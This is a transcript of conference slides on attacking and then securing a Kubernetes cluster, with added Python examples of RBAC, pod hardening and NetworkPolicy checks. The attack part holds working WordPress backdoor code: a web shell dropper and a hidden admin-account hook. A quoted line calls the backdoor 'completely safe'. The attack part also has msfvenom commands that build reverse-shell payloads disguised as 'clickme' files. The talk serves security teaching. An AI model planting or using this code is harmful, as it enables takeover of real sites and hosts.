Attacking a K8s cluster and how defending it
Johann du Toit
October 31, 2019
Technology
Will show how to attack a Kubernetes cluster followed promptly by how to secure your cluster.
Transcript
Bust a Kube: Let’s attack a Kubernetes cluster and secure it along the way
WHAT ATTACKING DEFENDING
WHAT ATTACKING OMG HELP
PODS NODES SERVICES NAMESPACES
Pod: Pods are the smallest unit of work in Kubernetes. All containers in a pod share an IP address.
[Diagram: a pod containing a container and a volume; pod IP addresses 10.10.10.1 to 10.10.10.4]
Node: Kubelet, Container Runtime (Docker), Kube-proxy
[Diagram: a node running the kubelet, a container runtime and pods #1 to #3]
Services: A service is a load balancer; it creates a DNS name and an IP address that routes traffic to pods with matching labels.
[Diagram: public traffic reaches the service IP address 10.100.10.1 and is routed to pods at 10.10.10.2 labelled app=hello, tier=web]
Namespaces: Logical grouping of resources, and the first hint of multi-tenancy.
[Diagram: Marketing and Finance namespaces, each containing pods at 10.10.10.2]
> kubectl apply -f app.yaml
KUBERNETES API SERVER KUBELET CONTAINER RUNTIME ETCD KUBERNETES DASHBOARD
Attacks tend to start from a pod.
[Repeat of the pod diagram: pods are the smallest unit of work in Kubernetes; all containers in a pod share an IP address]
<?php
add_action('wp_head', 'WordPress_bscript');
function WordPress_bscript() {
    // Drops exec.php next to the site: a one-line web shell that runs
    // whatever arrives in the "c" request parameter
    file_put_contents("exec.php", '<?php echo shell_exec($_REQUEST["c"]);');
}
?>
<?php
add_action('wp_head', 'WordPress_backdoor');
function WordPress_backdoor() {
    // Triggered by visiting the site with ?backdoor=go: creates an "admin"
    // user with a fixed password and gives it the administrator role
    if ($_GET['backdoor'] == 'go') {
        require('wp-includes/registration.php');
        if (!username_exists('backdooradmin')) {
            $user_id = wp_create_user('admin', 'admin');
            $user = new WP_User($user_id);
            $user->set_role('administrator');
        }
    }
}
?>
“Head over to your site and try the function. It’s fun, completely safe and can help you in the future if you ever need to have a backdoor entry to your website.”
Kali Linux
msfvenom \
  -p linux/x64/meterpreter/reverse_tcp \
  LHOST=<your ip> \
  LPORT=<some port> \
  -f sh \
  -o clickme.sh

msfvenom \
  -p linux/x64/meterpreter/reverse_tcp \
  LHOST=<your ip> \
  LPORT=<some port> \
  -f elf \
  -o clickme

msfvenom \
  -p linux/x64/meterpreter/reverse_tcp \
  LHOST=<your ip> \
  LPORT=<some port> \
  -f exe \
  -o clickme.exe

msfvenom \
  -p linux/x64/meterpreter/reverse_tcp \
  LHOST=<your ip> \
  LPORT=<some port> \
  -f macho \
  -o clickme.macho
KUBERNETES API SERVER KUBELET CONTAINER RUNTIME ETCD KUBERNETES DASHBOARD
CONTROL PLANE NETWORKING HOST RUNTIME
UPGRADE!
Role Based Access Control
“RBAC”
[Diagram: Role: MarketingAdmin and Role: Developer, attached to their users through a RoleBinding]

apiVersion: rbac.authorization.k8s.io/v1
kind: Role            # the slide says ClusterRole, but a ClusterRole is cluster-scoped and cannot carry a namespace; a namespaced secret reader is a Role
metadata:
  namespace: marketing
  name: secret-reader
rules:
- apiGroups: [""]
  resources: ["secrets"]
  verbs: ["get", "watch", "list"]
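The secret-reader role on the slide grants nothing on its own: a RoleBinding has to attach it to a subject, and it then only has effect inside its own namespace. The following Python model of that resolution is an added example, not code from the talk. The Role is the slide's (as a namespaced Role); the RoleBinding, the user name "alice" and the request values are constructed for illustration. It generalises the single role on the slide to any set of Roles and RoleBindings and, like the API server's RBAC authorizer, answers "no" for anything not explicitly granted.

```python
"""Minimal model of how the API server resolves an RBAC request.

Added example; the Role is the slide's secret-reader, everything else
(binding, subject, requests) is constructed for illustration.
"""

# The slide's Role: only grants access to secrets in the "marketing" namespace.
SECRET_READER = {
    "apiVersion": "rbac.authorization.k8s.io/v1",
    "kind": "Role",
    "metadata": {"namespace": "marketing", "name": "secret-reader"},
    "rules": [
        {"apiGroups": [""], "resources": ["secrets"], "verbs": ["get", "watch", "list"]},
    ],
}

# Constructed RoleBinding: attaches the Role to the user "alice" (assumed name).
MARKETING_ADMIN_BINDING = {
    "apiVersion": "rbac.authorization.k8s.io/v1",
    "kind": "RoleBinding",
    "metadata": {"namespace": "marketing", "name": "marketing-admin"},
    "subjects": [{"kind": "User", "name": "alice"}],
    "roleRef": {"apiGroup": "rbac.authorization.k8s.io", "kind": "Role", "name": "secret-reader"},
}


def rule_matches(rule, api_group, resource, verb):
    """A rule matches when group, resource and verb all match ('*' is a wildcard)."""
    def match(allowed, value):
        return "*" in allowed or value in allowed
    return (match(rule.get("apiGroups", []), api_group)
            and match(rule.get("resources", []), resource)
            and match(rule.get("verbs", []), verb))


def is_allowed(roles, bindings, user, namespace, verb, resource, api_group=""):
    """Return True if some RoleBinding in `namespace` names `user` and references a
    Role in that namespace with a rule allowing the request.

    RBAC is deny-by-default: no matching rule means no access. ClusterRole
    references are outside this model and grant nothing here.
    """
    roles_by_key = {(r["metadata"]["namespace"], r["metadata"]["name"]): r for r in roles}
    for binding in bindings:
        if binding["metadata"]["namespace"] != namespace:
            continue  # a RoleBinding only has effect in its own namespace
        if not any(s["kind"] == "User" and s["name"] == user for s in binding["subjects"]):
            continue  # the binding is for someone else
        ref = binding["roleRef"]
        if ref["kind"] != "Role":
            continue  # ClusterRole references not modelled here
        role = roles_by_key.get((namespace, ref["name"]))
        if role is None:
            continue  # a dangling roleRef grants nothing
        if any(rule_matches(rule, api_group, resource, verb) for rule in role["rules"]):
            return True
    return False


if __name__ == "__main__":
    roles, bindings = [SECRET_READER], [MARKETING_ADMIN_BINDING]
    for ns, verb, res in [("marketing", "get", "secrets"), ("marketing", "delete", "secrets"),
                          ("finance", "get", "secrets"), ("marketing", "get", "pods")]:
        print(f"alice {verb} {res} in {ns}: {is_allowed(roles, bindings, 'alice', ns, verb, res)}")
```

The two things the model makes visible are the namespace boundary (the same binding grants nothing in finance) and the verb list (get/list/watch never implies delete), which is what makes a namespaced Role with a short verb list the least-privilege default over a ClusterRole.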
CONTROL PLANE NETWORKING HOST RUNTIME
Step 1: Run as non-root. Step 2: Read-only filesystem. Step 3: Prevent escaping. The three steps combined in one manifest (the slide builds it up one field per step; readOnlyRootFilesystem and allowPrivilegeEscalation are container-level fields, so they belong under the container's securityContext rather than the pod's):

apiVersion: v1
kind: Pod
metadata:
  name: security-context-demo
spec:
  securityContext:
    runAsUser: 1000                    # Step 1: run as non-root (pod-level default for every container)
  containers:
  - name: demo                         # container name and image are placeholders; the slide shows neither
    image: <your image>
    securityContext:
      readOnlyRootFilesystem: true     # Step 2: read-only root filesystem
      allowPrivilegeEscalation: false  # Step 3: prevent escaping (no setuid/capability gains at exec time)
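To check that a workload actually has the three steps in place, the following Python audit is an added example, not code from the talk or from any of the tools it lists. It walks a Pod manifest and reports which of the three settings are missing, taking into account that container-level securityContext fields override pod-level ones and that readOnlyRootFilesystem and allowPrivilegeEscalation only exist at container level. The two manifests are constructed; the image name is a placeholder. A read-only root filesystem is also what stops a dropped file such as the exec.php from the WordPress example earlier from being written inside the container.

```python
"""Audit a Pod manifest for the three hardening steps from the talk.

Added example; both manifests are constructed and the image is a placeholder.
"""

WEAK_POD = {
    "apiVersion": "v1", "kind": "Pod",
    "metadata": {"name": "weak"},
    # No securityContext at all: runs as whatever the image says (often uid 0),
    # writable root filesystem, privilege escalation allowed by default.
    "spec": {"containers": [{"name": "app", "image": "example/app:1.0"}]},
}

HARDENED_POD = {
    "apiVersion": "v1", "kind": "Pod",
    "metadata": {"name": "hardened"},
    "spec": {
        "securityContext": {"runAsUser": 1000, "runAsNonRoot": True},  # Step 1
        "containers": [{
            "name": "app", "image": "example/app:1.0",
            "securityContext": {
                "readOnlyRootFilesystem": True,      # Step 2
                "allowPrivilegeEscalation": False,   # Step 3
            },
        }],
    },
}


def effective(pod_ctx, container_ctx, key):
    """Container-level securityContext settings override pod-level ones."""
    if key in container_ctx:
        return container_ctx[key]
    return pod_ctx.get(key)


def audit_pod(pod):
    """Return a list of findings; an empty list means all three steps are in place."""
    findings = []
    spec = pod["spec"]
    pod_ctx = spec.get("securityContext", {})
    for container in spec.get("containers", []):
        name = container["name"]
        ctx = container.get("securityContext", {})
        run_as_user = effective(pod_ctx, ctx, "runAsUser")
        run_as_non_root = effective(pod_ctx, ctx, "runAsNonRoot")
        # Step 1: explicit uid 0 is root; no uid and no runAsNonRoot means the
        # image default applies, which the manifest cannot vouch for.
        if run_as_user == 0 or (run_as_user is None and run_as_non_root is not True):
            findings.append(f"{name}: may run as root (set runAsUser or runAsNonRoot)")
        # Step 2: container-level only; absent means writable.
        if ctx.get("readOnlyRootFilesystem") is not True:
            findings.append(f"{name}: root filesystem is writable")
        # Step 3: allowPrivilegeEscalation defaults to true when omitted.
        if ctx.get("allowPrivilegeEscalation") is not False:
            findings.append(f"{name}: allowPrivilegeEscalation is not disabled")
        # Not one of the three steps, but a privileged container undoes all of them.
        if ctx.get("privileged") is True:
            findings.append(f"{name}: privileged container")
    return findings


if __name__ == "__main__":
    for pod in (WEAK_POD, HARDENED_POD):
        print(pod["metadata"]["name"], audit_pod(pod) or "OK")
```

The override rule matters in practice: a pod-level runAsUser of 1000 is silently undone by a container that sets runAsUser: 0, so an audit has to look at the effective value per container, not at the pod spec alone.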
CONTROL PLANE NETWORKING HOST RUNTIME
Network Policy

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-db-access
spec:
  podSelector:
    matchLabels:
      tier: database
  policyTypes:
  - Ingress
  ingress:
  - from:
    - podSelector:
        matchLabels:
          tier: frontend    # the slide shows only "frontend"; the label key is assumed to be tier, matching the database selector above
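How a policy like allow-db-access is evaluated: while no policy selects a pod, all ingress to it is allowed; once any policy selects it, only traffic matched by some rule of some selecting policy gets through, and policies are additive. The following Python evaluator is an added example, not code from the talk. The allow-db-access policy mirrors the slide (with the frontend peer label assumed to be tier=frontend); the default-deny policy and the pod labels are constructed. It only handles podSelector peers, so it models pods within a single namespace and ignores namespaceSelector and ipBlock.

```python
"""Evaluate whether ingress from one pod to another is allowed by a set of
NetworkPolicies. Added example; models a single namespace and podSelector peers only."""

# The slide's policy: pods labelled tier=database accept ingress only from
# pods labelled tier=frontend (label key assumed).
ALLOW_DB_ACCESS = {
    "apiVersion": "networking.k8s.io/v1", "kind": "NetworkPolicy",
    "metadata": {"name": "allow-db-access"},
    "spec": {
        "podSelector": {"matchLabels": {"tier": "database"}},
        "policyTypes": ["Ingress"],
        "ingress": [{"from": [{"podSelector": {"matchLabels": {"tier": "frontend"}}}]}],
    },
}

# Constructed default-deny policy: selects every pod (empty podSelector) and
# lists no ingress rules, so nothing is allowed unless another policy adds it.
DEFAULT_DENY_INGRESS = {
    "apiVersion": "networking.k8s.io/v1", "kind": "NetworkPolicy",
    "metadata": {"name": "default-deny-ingress"},
    "spec": {"podSelector": {}, "policyTypes": ["Ingress"]},
}


def labels_match(selector, labels):
    """matchLabels semantics: every selector key/value must be on the pod.
    An empty selector matches everything."""
    return all(labels.get(k) == v for k, v in selector.get("matchLabels", {}).items())


def ingress_allowed(policies, src_labels, dst_labels):
    """Return True if a pod with src_labels may send traffic to a pod with dst_labels."""
    selecting = [
        p for p in policies
        if labels_match(p["spec"]["podSelector"], dst_labels)
        and "Ingress" in p["spec"].get("policyTypes", ["Ingress"])
    ]
    if not selecting:
        return True  # no policy selects the destination: default allow
    for policy in selecting:
        for rule in policy["spec"].get("ingress", []):
            peers = rule.get("from")
            if not peers:
                return True  # a rule without 'from' allows every source
            for peer in peers:
                if "podSelector" in peer and labels_match(peer["podSelector"], src_labels):
                    return True  # policies are additive: one match is enough
    return False  # selected, but no rule matched this source


if __name__ == "__main__":
    policies = [DEFAULT_DENY_INGRESS, ALLOW_DB_ACCESS]
    print("frontend -> database:", ingress_allowed(policies, {"tier": "frontend"}, {"tier": "database"}))
    print("scanner  -> database:", ingress_allowed(policies, {"app": "scanner"}, {"tier": "database"}))
    print("scanner  -> frontend:", ingress_allowed(policies, {"app": "scanner"}, {"tier": "frontend"}))
```

Run with only the slide's policy, the frontend pods stay reachable from anything in the namespace, because no policy selects them; adding the default-deny policy is what closes that gap, and the database rule keeps working because the two policies are combined rather than the more specific one winning.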
CONTROL PLANE NETWORKING HOST RUNTIME
Minimal Host OS
AppArmor
seccomp
Questions?
• CIS Benchmark - CIS Security
• Kube-bench - Aqua Security
• Kube Auto Analyzer - Rory McCune
• KubeAudit - Shopify
• Sonobuoy - VMWare / Heptio
• KubeATF - Symantec
Security is not a noun you refer to every now and then; it’s a verb, and it involves constant and specific action.
Thanks!
[email protected]
@signedness